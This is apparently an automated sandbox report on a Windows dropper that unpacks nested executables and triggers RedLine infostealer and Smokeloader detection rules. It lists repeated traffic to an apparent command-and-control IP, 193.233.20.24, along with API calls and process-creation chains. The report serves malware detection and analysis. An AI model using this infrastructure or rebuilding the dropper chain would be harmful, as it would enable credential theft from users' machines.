caQi43qE17.exe, 0000000A.00000002.366074072.00000000037BD000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.00000000037A0000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.0000000002856000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.00000000027C9000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.000000000395F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.24
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.24
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.24
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.24
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.24
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.24
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.24
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.24
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.24
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.24
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.24
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.24
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.24
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.24
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.24
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.24
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.24
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.24
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.24
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.24
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.24
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.24
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.24
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.24
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.24
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.24
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.24
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.24
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.24
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.24
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.24
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.24
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.24
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.24
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.24
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.24
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.24
                    Source: caQi43qE17.exe, 0000000A.00000002.363496581.00000000008BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                    System Summary

                    barindex
                    Source: 10.2.caQi43qE17.exe.4a80ee8.5.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 10.2.caQi43qE17.exe.7e6cce.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 10.2.caQi43qE17.exe.4b50000.6.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 10.2.caQi43qE17.exe.7e6cce.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.3.file.exe.50d5420.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 10.2.caQi43qE17.exe.4b50000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 10.2.caQi43qE17.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 10.2.caQi43qE17.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.3.file.exe.50d5420.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 10.2.caQi43qE17.exe.4a80000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 10.2.caQi43qE17.exe.4a80000.4.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 10.3.caQi43qE17.exe.941a70.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 10.2.caQi43qE17.exe.4a80ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 10.2.caQi43qE17.exe.7e7bb6.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 10.3.caQi43qE17.exe.941a70.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 10.2.caQi43qE17.exe.7e7bb6.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 10.2.caQi43qE17.exe.680e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0000000A.00000002.368106745.0000000004A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0000000A.00000002.363557485.00000000008D6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 0000000A.00000002.362811186.0000000000680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0000000A.00000002.368647038.0000000004B50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\grWB27Fb84.exe, type: DROPPEDMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00173BA20_2_00173BA2
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00175C9E0_2_00175C9E
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exeCode function: 1_2_00393BA21_2_00393BA2
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exeCode function: 1_2_00395C9E1_2_00395C9E
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exeCode function: 2_2_00133BA22_2_00133BA2
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exeCode function: 2_2_00135C9E2_2_00135C9E
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exeCode function: 3_2_00FD3BA23_2_00FD3BA2
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exeCode function: 3_2_00FD5C9E3_2_00FD5C9E
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCode function: 10_2_00408C6010_2_00408C60
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCode function: 10_2_0040DC1110_2_0040DC11
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCode function: 10_2_00407C3F10_2_00407C3F
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCode function: 10_2_00418CCC10_2_00418CCC
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCode function: 10_2_00406CA010_2_00406CA0
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCode function: 10_2_004028B010_2_004028B0
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCode function: 10_2_0041A4BE10_2_0041A4BE
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCode function: 10_2_0041824410_2_00418244
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCode function: 10_2_0040165010_2_00401650
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCode function: 10_2_00402F2010_2_00402F20
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCode function: 10_2_004193C410_2_004193C4
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCode function: 10_2_0041878810_2_00418788
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCode function: 10_2_00402F8910_2_00402F89
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCode function: 10_2_00402B9010_2_00402B90
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCode function: 10_2_004073A010_2_004073A0
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCode function: 10_2_008D609010_2_008D6090
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCode function: 10_2_024620C810_2_024620C8
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCode function: 10_2_02461DAA10_2_02461DAA
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCode function: 10_2_02461DB810_2_02461DB8
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCode function: 10_2_050DECC810_2_050DECC8
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\IXP002.TMP\diIN97YY43.exe B873395D8B0B53E7C0F6192AE48A129253F4D592A58919DDE8668B9D3FA9EB33
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 10.2.caQi43qE17.exe.4a80ee8.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 10.2.caQi43qE17.exe.7e6cce.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 10.2.caQi43qE17.exe.4b50000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 10.2.caQi43qE17.exe.7e6cce.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.3.file.exe.50d5420.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 10.2.caQi43qE17.exe.4b50000.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 10.2.caQi43qE17.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 10.2.caQi43qE17.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.3.file.exe.50d5420.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 10.2.caQi43qE17.exe.4a80000.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 10.2.caQi43qE17.exe.4a80000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 10.3.caQi43qE17.exe.941a70.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 10.2.caQi43qE17.exe.4a80ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 10.2.caQi43qE17.exe.7e7bb6.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 10.3.caQi43qE17.exe.941a70.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 10.2.caQi43qE17.exe.7e7bb6.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 10.2.caQi43qE17.exe.680e67.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0000000A.00000002.368106745.0000000004A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0000000A.00000002.363557485.00000000008D6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 0000000A.00000002.362811186.0000000000680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0000000A.00000002.368647038.0000000004B50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\grWB27Fb84.exe, type: DROPPEDMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00171F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_00171F90
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exeCode function: 1_2_00391F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_00391F90
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exeCode function: 2_2_00131F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,2_2_00131F90
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exeCode function: 3_2_00FD1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,3_2_00FD1F90
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCode function: String function: 0040E1D8 appears 44 times
                    Source: file.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 889758 bytes, 2 files, at 0x2c +A "pluT14Nj54.exe" +A "grWB27Fb84.exe", ID 2298, number 1, 34 datablocks, 0x1503 compression
                    Source: pluT14Nj54.exe.0.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 749822 bytes, 2 files, at 0x2c +A "plct23La85.exe" +A "fuYn3946BI92.exe", ID 2432, number 1, 31 datablocks, 0x1503 compression
                    Source: grWB27Fb84.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: plct23La85.exe.1.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 520188 bytes, 2 files, at 0x2c +A "plvy67MJ29.exe" +A "diIN97YY43.exe", ID 2311, number 1, 20 datablocks, 0x1503 compression
                    Source: plvy67MJ29.exe.2.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 241390 bytes, 2 files, at 0x2c +A "buze36rj14.exe" +A "caQi43qE17.exe", ID 2371, number 1, 10 datablocks, 0x1503 compression
                    Source: file.exe, 00000000.00000003.256542191.0000000004FF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
                    Source: file.exe, 00000000.00000003.256542191.0000000004FF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMoues.exe< vs file.exe
                    Source: file.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
                    Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\buze36rj14.exe.logJump to behavior
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@15/10@0/1
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0017597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_0017597D
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exeCode function: 4_2_00007FFBACE61B10 ChangeServiceConfigA,4_2_00007FFBACE61B10
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00174FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,0_2_00174FE0
                    Source: file.exeReversingLabs: Detection: 64%
                    Source: file.exeVirustotal: Detection: 54%
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exe
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00171F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_00171F90
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exeCode function: 1_2_00391F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_00391F90
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exeCode function: 2_2_00131F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,2_2_00131F90
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exeCode function: 3_2_00FD1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,3_2_00FD1F90
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMPJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0017597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_0017597D
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCode function: 10_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,10_2_004019F0
